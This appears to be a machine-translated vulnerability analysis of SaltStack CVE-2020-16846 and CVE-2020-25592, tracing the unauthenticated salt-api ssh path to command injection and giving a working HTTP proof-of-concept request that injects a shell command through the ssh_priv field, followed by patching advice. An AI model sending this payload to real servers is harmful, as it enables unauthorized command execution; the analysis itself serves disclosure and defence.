Shulou(Shulou.com)05/31 Report--

How to achieve SaltStack unauthorized access and command execution vulnerabilities CVE-2020-16846 and 25592 analysis, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

1. Overview of background vulnerabilities:

SaltStack is a distributed operation and maintenance system, which is widely used in Internet scenarios. It has the following two main functions: a configuration management system, which can maintain remote nodes in a predefined state (for example, ensuring that specific software packages are installed and running specific services). Distributed remote execution systems are used to execute commands and query data on remote nodes individually or through arbitrary selection criteria

On November 4, 2020, SaltStack officially issued a security update announcement, in which the combination of CVE-2020-16846 and CVE-2020-25592 can execute arbitrary commands through the salt-api interface without authorization. CVE-2020-25592 allows any user to call the SSH module, and CVE-2020-16846 allows the user to execute arbitrary commands. Although salt-api is not enabled by default, the vast majority of SaltStack users will choose to enable salt-api, so there is a high risk.

Vulnerability number:

CVE-2020-16846, CVE-2020-25592

Affected version:

3002

3001.1, 3001.2

3000.3, 3000.4

2019.2.5, 2019.2.6

2018.3.5

2017.7.4, 2017.7.8

2016.11.3, 2016.11.6,2016.11.10

2016.3.4, 2016.3.6,2016.3.8

2015.8.10, 2015.8.13

2. Vulnerability analysis and POC vulnerability analysis

As of November 11, 2020, the patch code has not yet been merged with the master branch code in Github, so it can be obtained directly from the official Github warehouse of SaltStack. At present, the code version of master is 3002, and the system is Mac. The version number varies greatly and the code changes greatly, which needs to be analyzed separately.

Salt Version: Salt: 3002-56-g3e269eda82 Dependency Versions: cffi: 1.14.3 cherrypy: unknown dateutil: Not Installed docker-py: Not Installed gitdb: 4.0.5 gitpython: 3.1.11 Jinja2: 2.11.2 libgit2: Not Installed M2Crypto: Not Installed Mako: 1.0.7 msgpack: 1.0.0 msgpack-pure: Not Installed mysql -python: Not Installed pycparser: 2.19 pycrypto: Not Installed pycryptodome: 3.9.9 pygit2: Not Installed Python: 3.8.2 (default Sep 24 2020 19:37:08) python-gnupg: Not Installed PyYAML: 5.3.1 PyZMQ: 19.0.2 smmap: 3.0.4 timelib: Not Installed Tornado: 4.5.3 ZMQ: 4.3.2 System Versions: dist: darwin 19.6.0 locale: utf-8 machine: x86 million 64 release: 19.6.0 System: Darwin version: 10.15.6 x86_64

The salt-api REST interface uses the cherrypy framework by default. From the implementation of the run interface, we can see that the methods in the NetapiClient class are called dynamically through client parameters.

The following convention is used to specify the code location in this article: FileLocation:Classname.method ()

Salt/netapi/init.py:NetapiClient.run ()

Salt/netapi/init.py:NetapiClient.run ()

The parameter low is an external parameter, and the salt.utils.args.format_call method assigns the parameter to * * kwargs.

When the client parameter is ssh, salt/netapi/init.py:NetapiClient.ssh () is called dynamically, and the method does not use any authentication.

Salt/netapi/init.py:NetapiClient.ssh ()

Follow up, the path is as follows:

Salt/netapi/init.py:NetapiClient.ssh () ⇒ salt/client/ssh/client.py:SSHClient.cmd_sync () ⇒ salt/client/ssh/client.py:SSHClient._prep_ssh ()

Salt/client/ssh/client.py:SSHClient._prep_ssh ()

In this method, the external controllable parameters of kwargs are updated with the value opts variable, which can be understood as the environment variable of SaltStack system, and this variable is used to initialize salt.client.ssh.SSH.

Salt/client/ssh/init.py:SSH.__init__ ()

The value of priv is obtained from the opts variable and the salt.client.ssh.shell.gen_key () method is called.

Salt/client/ssh/shell.py:gen_key (),

In this method, the commands are spliced and executed. The COMMAND command can be executed when the input value is | COMMAND > {} #.

POC

From the above analysis, the POC is as follows:

POST / run HTTP/1.1Host: 127.0.0.1:8000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0Accept: application/x-yamlAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 109token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa | open%20/System/Applications/Calculator.app%3b

About the recurring environment

1. Reproduction on Mac requires manual creation of log folders, configuration folders, etc., and relevant configurations need to be manually written.

2. By default, there is no SSH in the image pulled by Docker from the official environment, so the salt-api will hang when the poc is executed. After testing, version 3002 will restart automatically, while version 3000.4 and version 2019.2.5 will not. Therefore, when salt-api hangs up, priority is given to whether SSH software is available on the current machine.

III. Safety recommendations

1. Fix it as soon as possible. As the official upgrade package has not been released, it still needs to be fixed manually. Here is the official security notice and fix.

two。 If you do not have to use salt-api, turn off this feature.

After reading the above, do you know how to analyze SaltStack unauthorized access and command execution vulnerabilities CVE-2020-16846 and 25592? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.